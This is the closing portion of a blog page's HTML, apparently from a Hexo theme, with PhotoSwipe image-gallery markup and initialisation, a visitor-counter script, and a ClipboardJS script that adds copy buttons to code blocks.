                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script>

<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->


<script src="/js/busuanzi-2.3.pure.min.js"></script>


<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->


<link rel="stylesheet" href="/css/clipboard.css">

<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>


<!-- CanvasBackground -->


    
  </div>
</body>

</html>